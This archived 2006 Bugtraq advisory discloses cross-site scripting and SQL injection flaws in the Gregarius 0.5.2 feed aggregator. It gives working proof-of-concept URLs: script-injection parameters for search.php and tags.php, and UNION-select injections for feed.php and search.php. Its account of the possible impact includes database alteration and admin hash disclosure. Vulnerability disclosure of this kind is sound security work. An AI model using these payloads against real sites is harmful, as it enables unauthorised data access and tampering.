lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 3 Mar 2006 13:29:55 -0000 From: tzitaroth@...il.com To: bugtraq@...urityfocus.com Subject: Gregarius 0.5.2 XSS and SQL Injection Vulnerabilities http://gregarius.net/ Gregarius is a web-based RSS/RDF/ATOM feed aggregator, designed to run on your web server, allowing you to access your news sources from wherever you want. XSS in search.php: search.php?rss_query=<script>alert(1)</script>&rss_query_match=exact XSS in tags.php: tags.php?tag=<script>alert(1)</script> SQL Injection in feed.php: feed.php?folder=3 and 1=1 UNION select title from item-- with magic_quotes=off: SQL Injection in search.php: search.php?rss_query=aa%')) UNION select null,null,null,null,null,null,null,null,null,null,null,title,null from item-- &rss_query_match=exact On Gregarius 0.5.2/PostrgreSQL this could lead to damaging/altering the DB and possible local file disclosure due to not properly sanitized $lang include, on early 0.5.3 svn version to admin hash disclosure. More XSS and SQL Injections in admin section. Fixed in latest 0.5.3 svn.
Powered by blists - more mailing lists